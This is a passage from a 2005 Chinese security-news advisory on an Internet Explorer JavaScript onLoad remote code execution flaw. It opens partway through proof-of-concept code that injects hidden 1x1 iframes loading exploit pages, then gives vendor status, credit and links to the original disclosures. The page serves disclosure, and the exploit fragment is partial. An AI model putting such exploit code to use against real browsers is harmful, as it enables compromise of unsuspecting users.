首页 > 经验交流 > 正文
IE JavaScript OnLoad处理远程代码执行漏洞

日期:2005年11月24日 新闻来源: 作者: 新闻阅读次数:
src=bug2k.htm></iframe>')
}

if( iframecount == 4 ){
//alert(Ɗ');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0 
src=bug.htm></iframe>')
}

//+'<iframe width=1 height=1 border=0 frameborder=0 src=bug.htm></iframe>'
//)



}
</script>
</head>

<body onLoad=self.moveTo(0,0);self.resizeTo(screen.width,screen.height);>

<p>&nbsp;</p>
<p>&nbsp;</p>

<table border=0 width=100% id=t

厂商解决方案
目前没有解决方案提供:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/default.asp

漏洞提供者
Benjamin Tobias Franz <0-1-2-3@gmx.de>. 

漏洞消息链接
http://www.securityfocus.com/archive/1/401009

漏洞消息标题
Microsoft Internet Explorer - Crash on JavaScript window()-calling 

漏洞消息链接
http://www.computerterrorism.com/research/ie/ct21-11-2005

漏洞消息标题
Internet Explorer JavaScript Window() Remote Code Execution

2共  上一页 1 2

相关新闻:
·PHP 存在远程任意文件读取及目录遍历的漏洞 (2005年4月8日)
·PHP JPEG存处理不正确远程任意指令执行漏洞 (2005年4月8日)
·Win XP SP2又出漏洞 微软偷偷发"严重"补丁 (2005年4月8日)
·Adobe推出Acrobat升级版 修补三个严重漏洞 (2005年4月8日)
·NetWare 操作系统存在屏幕保护验证绕过漏洞 (2005年4月8日)
Copyright @2007 qjwa.org All Rights Reserved.
云南省曲靖市网络安全协会 版权所有 现代科技有限公司制作